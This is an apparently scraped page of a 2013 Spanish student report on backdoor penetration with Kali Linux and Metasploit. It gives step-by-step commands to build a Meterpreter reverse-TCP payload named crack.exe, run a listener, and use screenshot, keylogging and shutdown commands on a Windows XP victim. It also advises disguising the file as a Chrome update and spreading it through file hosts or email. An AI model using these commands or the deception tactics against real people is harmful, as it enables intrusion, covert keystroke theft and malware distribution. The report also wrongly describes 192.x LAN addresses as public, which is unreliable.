Fisiologia.Articular. 3 Kapandji.6a.Ed.pdfFisiologia.Articular. 3 Kapandji.6a.Ed.pdf
Fisiologia.Articular. 3 Kapandji.6a.Ed.pdf
 
Los Nueve Principios del Desempeño de la Sostenibilidad
Los Nueve Principios del Desempeño de la SostenibilidadLos Nueve Principios del Desempeño de la Sostenibilidad
Los Nueve Principios del Desempeño de la Sostenibilidad
 
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
 
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADO
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADODECÁGOLO DEL GENERAL ELOY ALFARO DELGADO
DECÁGOLO DEL GENERAL ELOY ALFARO DELGADO
 
LA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS.pdf
LA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS.pdfLA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS.pdf
LA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS.pdf
 
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO  2024 MINEDUFICHA DE MONITOREO Y ACOMPAÑAMIENTO  2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDU
 

Penetración con una Backdoor

  • 1. Pachuca Hgo. A 05 de Diciembre del 2013 Backdoor Unidad 5 Materia: Seguridad en TI Catedrático: Javier Hernández Orosco. Alumna: Ana Karen Velasco Soto N.C 09200867
  • 2. Tabla de contenido Introducción ........................................................................................................................................ 2 ¿Qué es Kali Linux? .......................................................................................................................... 2 ¿Qué es una Backdoor?................................................................................................................... 2 ¿Qué es Metasploit? ....................................................................................................................... 2 Desarrollo ............................................................................................................................................ 3 Instalando kali linux… ...................................................................................................................... 3 Realizando el ataque ....................................................................................................................... 7 Conclusión ......................................................................................................................................... 23 Referencias ........................................................................................................................................ 24 Tabla de Ilustraciones ILUSTRACIÓN 1 OBTENER DIRECCIÓN IP ....................................................................................................................... 7 ILUSTRACIÓN 2 RUTA PARA EL METSPLOIT .................................................................................................................... 8 ILUSTRACIÓN 3 RAÍZ ................................................................................................................................................ 9 ILUSTRACIÓN 4 MSFCONSOLE ..................................................................................................................................... 9 ILUSTRACIÓN 5 METASPLOIT INICIADO ....................................................................................................................... 10 ILUSTRACIÓN 6 UTILIZANDO LA IP............................................................................................................................. 11 ILUSTRACIÓN 7 CREANDO LA BACKDOOR .................................................................................................................... 12 ILUSTRACIÓN 8 EXITOSO ......................................................................................................................................... 12 ILUSTRACIÓN 9 VERIFICACIÓN DE CRACK.EXE............................................................................................................... 13 ILUSTRACIÓN 10 HANDLER ...................................................................................................................................... 13 ILUSTRACIÓN 11 SETEANDO EL BACKDOOR ................................................................................................................. 14 ILUSTRACIÓN 12 EXPLOIT EN MODO ESCUCHA ............................................................................................................. 15 ILUSTRACIÓN 13 MÁQUINA VIRTUAL CON XP SIN ANTIVIRUS.......................................................................................... 15 ILUSTRACIÓN 14 DESCARGA DE CRHOME.EXE .............................................................................................................. 16 ILUSTRACIÓN 15 VICTIMA GUARDADNO EL .EXE ........................................................................................................... 16 ILUSTRACIÓN 16 EJECUTANDO 1 .............................................................................................................................. 17 ILUSTRACIÓN 17 EJECUCION 2 ................................................................................................................................. 17 ILUSTRACIÓN 18 METERPRETER ............................................................................................................................... 18 ILUSTRACIÓN 19 COMANDO SCREENSHOT.................................................................................................................. 18 ILUSTRACIÓN 20 PANTALLA DE PC VICTIMA ................................................................................................................ 19 ILUSTRACIÓN 21 SCREENSHOT DE LA PANTALLA DEL OBJETIVO ........................................................................................ 19 ILUSTRACIÓN 22 COMANDO KEYSCAN_START ............................................................................................................. 20 ILUSTRACIÓN 23 KEYSCAN CORRIENDO ...................................................................................................................... 20 ILUSTRACIÓN 24 TEXTO COMPUTADORA VICTIMA ........................................................................................................ 21 ILUSTRACIÓN 25 SHUTDOWN .................................................................................................................................. 21 ILUSTRACIÓN 26 APAGANDO PC VICTIMA .................................................................................................................. 22 1
  • 3. Introducción El objetivo de este documento es llevar a cabo un ataque a una computadora vulnerable que este dentro de la misma red, por un método sencillo y eficaz haciendo uso de las famosas backdoors y de Kali Linux que trae las herramientas necesarias para la penetración. ¿Qué es Kali Linux? Kali Linux es una distribución de Linux avanzada para pruebas de penetración y auditorías de seguridad. Kali es una completa re-construcción de BackTrack Linux desde la base hacia arriba, y se adhiere completamente a los estándares de desarrollo de Debian. Toda la nueva infraestructura ha sido puesta en el lugar, todas las herramientas fueron revisadas y fueron embaladas, y hemos cambiado a Git para nuestro VCS. (Docs Kali, 2013). ¿Qué es una Backdoor? Estos programas son diseñados para abrir una "puerta trasera" en nuestro sistema de modo tal de permitir al creador del backdoor tener acceso al sistema y hacer lo que desee con él. El objetivo es lograr una gran cantidad de computadoras infectadas para disponer de ellos libremente hasta el punto de formar redes de botnets. (Segu-Info, 2013) Los crackers suelen usar puertas traseras para asegurar el acceso remoto a una computadora, intentando permanecer ocultos ante una posible inspección. Para instalar puertas traseras los crackers pueden usar troyanos, gusanos u otros métodos. Se ha afirmado, cada vez con mayor frecuencia, que los fabricantes de ordenadores preinstalan puertas traseras en sus sistemas para facilitar soporte técnico a los clientes, pero no ha podido comprobarse con seguridad. (Wikipedia, 2013) ¿Qué es Metasploit? Es una herramienta de kali linux que proporciona información acerca de vulnerabilidades de seguridad y ayuda en tests de penetración y en el desarrollo de firmas para sistemas de detección de intrusos. 2
  • 4. Desarrollo Para realizar el ataque por una backdoor vamos a utilizar kali Linux y una máquina virtual de XP para realizar la prueba, esta no debe tener antivirus o al menos no estar actualizado. Instalando kali linux… Seguir las siguientes pantallas en modo gráfico. 3
  • 5. 4
  • 6. 5
  • 7. 6
  • 8. Realizando el ataque Se abre una terminal en kali Linux. Antes que otra cosa, vamos a conocer la dirección IP con el comando ip addr, se deja la terminal abierta con la información mostrada, ya que se utilizara más adelante. ip addr Ilustración 1 Obtener dirección IP 7
  • 9. Ahora sigamos la ruta que se muestra en la imagen: Ilustración 2 Ruta para el Metsploit Ahora vamos a esperar un poco a que se inicie el servicio. El servicio que se inicia es el servidor de base de datos de Metasploit. Si al iniciarlo pide una contraseña, solo se ingresa la contraseña de la cuenta de usuario y clic en aceptar, las veces que sea necesario. 8
  • 10. La pantalla que debe aparecer es la que aparece abajo, y significa que el servidor ya inicio, y esperamos a que devuelva la raíz. Ilustración 3 Raíz Ahora vamos a iniciar lo que es la consola del Metasploit para poder trabajar con uno de los diferentes sploits que existen. Para esto escribimos la línea msfconsole como se puede observar, llevara más o menos de 2 a 3 minutos en correr la consola. msfconsole Ilustración 4 msfconsole 9
  • 11. Después de la espera de aproximadamente unos 3 a 5 minutos debe aparecer una ventana como la que se muestra. Esto indica que se ha iniciado el Metasploit. Ilustración 5 Metasploit iniciado Nota: Si ha ocurrido algún error o cosa extraña, se debe actualizar el Metasploit y las gemas de Ruby, siguiendo la siguiente ruta en kali: Applications/Software Update y asegurarse de tener una conexión a internet, la actualización empezara automáticamente. Una vez con esto para realizar el ataque debemos generar un archivo ejecutable, que es el que nos va a permitir tener el acceso al sistema que se va a atacar. Se debe escribir lo siguiente que es la línea que generara el archivo .exe que será enviado a nuestro objetivo. msfpayload windows/meterpreter/reverse_ tcp LHOST=192.168.1.72 LPORT=4444 x > crack.exe Se da Enter. La IP que aparece en la línea es de la tarjeta de Ethernet o inalámbrica, depende de que se esté utilizando en el momento, la IP que utilizaras empezara la mayoría de veces con 192.0.0.0 ya que 10
  • 12. estas conectado a internet y se asigna una IP pública. Al principio del documento fue lo primero que se mostró la manera de conocer la IP así que solo se debe abrir la otra terminal y copiar la dirección. Ilustración 6 Utilizando la IP Nota: Para la IP debes considerar la forma en que tu router asigna las IPS, ya que si reinicias la máquina virtual, automáticamente cargara otra IP y el archivo que se generó para accesar a la víctima quedara inservible. Te recomiendo que la asignes estática antes de generar tú archivo con la ip que tienes en pantalla. Revisa el siguiente link: http://www.ehowenespanol.com/asignardireccion-ip-estatica-linux-como_387011/ 11
  • 13. Iría quedando así en pantalla. Ilustración 7 Creando la backdoor La creación ha sido exitosa. Ilustración 8 Exitoso 12
  • 14. Se revisa la carpeta personal para ver el archivo crack.exe. Ilustración 9 Verificación de crack.exe Esperar a que regrese la raíz, para poder “setear” el ataque ósea configurarlo, escribiendo el siguiente comando. use exploit/multi/handler Y debe aparecer la raíz del handler. Ilustración 10 Handler 13
  • 15. Set LHOST 192.168.1.72 Set LPORT 4444 Con esto se ha seteado el backdoor para poder lanzar el ataque Ilustración 11 Seteando el backdoor Algunos puntos que cabe aclarar, es que de preferencia la pc víctima no debe tener antivirus, o al menos si lo tiene que no esté actualizado ya que al antivirus lo detecta inmediatamente. El archivo crack.exe, puede ser modificado por un nombre más creíble para que la víctima confíe en el ciegamente y podamos cumplir con el objetivo, se puede subir a servidores como MEGA, Mediafire, 4shared, o mandarlo por correo para difundirlo. Ahora a correr el exploit antes de mandar el archivo, esto para que el exploit quede escuchando cualquier conexión nueva la detecte inmediatamente. exploit 14
  • 16. Ilustración 12 Exploit en modo escucha Aquí vamos pasar el archivo crack.exe a la máquina virtual con XP que es totalmente vulnerable. Ilustración 13 Máquina virtual con XP sin antivirus Se puede ver como la PC victima descarga el archivo creyendo que es un .exe para actualizar su google chrome y tranquilamente lo ejecuta y espera ver respuesta pero no la hay así que normalmente el usuario busca otro archivo ejecutable para actualizar, pero ya se ha conseguido el 15
  • 17. control sobre la máquina. Ilustración 14 Descarga de crhome.exe Ilustración 15 Victima guardando el .exe 16
  • 18. Ilustración 16 Ejecutando 1 Ilustración 17 Ejecución 2 17
  • 19. Ahora del lado del atacante aparece la consola del meterpreter, esta sale automáticamente después de que la víctima ejecuto él .exe creado, en la consola se escriben los comandos para realizar una intrusión más significativa. Ilustración 18 Meterpreter Para verificar la intrusión podemos sacar una impresión de pantalla, de la máquina. screenshot Ilustración 19 Comando Screenshot 18
  • 20. Ilustración 20 Pantalla de PC victima Esta es la imagen de la impresión de pantalla obtenida. Se encontrara en el home de kali Linux. Ilustración 21 Screenshot de la pantalla del objetivo 19
  • 21. También algo que puede ser interesante es el saber qué es lo que se escribe en el objetivo. Vamos a inicializar el servicio. keyscan_start Ilustración 22 Comando keyscan_start Ahora para lograr extraer todo lo que se tecleo en la pc víctima. Para que muestre las palabras y acciones almacenadas en el buffer a la hora de escribir es: keyscan_dump Ilustración 23 Keyscan corriendo 20
  • 22. Lo que se escribió. Ilustración 24 Texto computadora victima Si se desea detener el escaneo de teclas es con: keyscan_stop Y ahora! A apagar la computadora! shutdown Ilustración 25 Shutdown 21
  • 23. Ilustración 26 Apagando PC victima Notas finales: Esta práctica se ha realizado con una máquina virtual de XP que no tiene antivirus alguno, no se sabe si también pueda funcionar en un Windows 7 vulnerable pero se puede hacer la prueba para aprender, debe ser el mismo procedimiento. Se debe estar conectado a la misma red, es un ataque en la red local, no un ataque remoto. 22
  • 24. Conclusión Con esto se puede concluir por el lado de la víctima que se debe tener un antivirus bien actualizado para evitar ataques, también se debe verificar bien, en que sitios navegamos y descargamos programas siempre hay que revisar que sean de páginas oficiales para evitar un engaño y así dar acceso al equipo. Por el lado del hacker, podría decirse que las backdoors son una forma de penetración casi infalible en pcs que estén totalmente desprotegidas, ya que las ventajas que tiene este tipo de ataque son, remover la evidencia de la entrada inicial de los logs del sistema, retener el acceso a la máquina y para ocultarlo se añade un nuevo servicio y se le puede dar un nombre del cual no se sospeche o mejor aún, utilizar un servicio que nuca se use, que este activado manualmente o totalmente. 23
  • 25. Referencias Bytechef. (03 de 12 de 2013). Obtenido de http://byteschef.com/es/instalar-kali-linux-envirtualbox-con-guest-additions/ Docs Kali. (05 de 12 de 2013). Obtenido de http://es.docs.kali.org/introduction-es/que-es-kalilinux Docs Kali linux. (04 de 12 de 2013). Obtenido de http://es.docs.kali.org/category/installation-es Hakin9. (05 de 12 de 2013). Obtenido de http://hakin9.org/kali-linux-see-whats-new-and-getadvanced-skills-with-hakin9s-tutorials/ kalilinux. (5 de 12 de 2013). Obtenido de http://kalilinux.foroactivo.com/t25-manual-nmap-parakali-linux-parte-1 Linuxlive. (1 de 12 de 2013). Obtenido de http://www.linuxliveusb.com/en/help/faq/virtualization/154-unable-to-boot-please-usea-kernel-appropriate-for-your-cpu Nyxbone. (06 de 12 de 2013). Obtenido de http://www.nyxbone.com/metasploit/Meterpreter.html OMHE. (04 de 12 de 2013). Obtenido de http://www.2013.omhe.org/wOoPs/uploads/2013/01/OMHE11.pdf RevistadeSeguridad. (1 de 12 de 2013). Obtenido de http://revista.seguridad.unam.mx/numero18/pruebas-de-penetraci%C3%B3n-para-principiantes-5-herramientas-para-empezar Segu-Info. (02 de 12 de 2013). Obtenido de http://www.segu-info.com.ar/malware/backdoor.htm Taringa. (1 de 12 de 2013). Obtenido de http://www.taringa.net/posts/linux/16545448/Kali-laHermana-de-Backtrack-Linux.html Wikipedia. (03 de 12 de 2013). Obtenido de http://es.wikipedia.org/wiki/Malware#Puertas_traseras_o_Backdoors Youtube. (01 de 12 de 2013). Obtenido de http://www.youtube.com/watch?v=FJoquV-G-qQ 24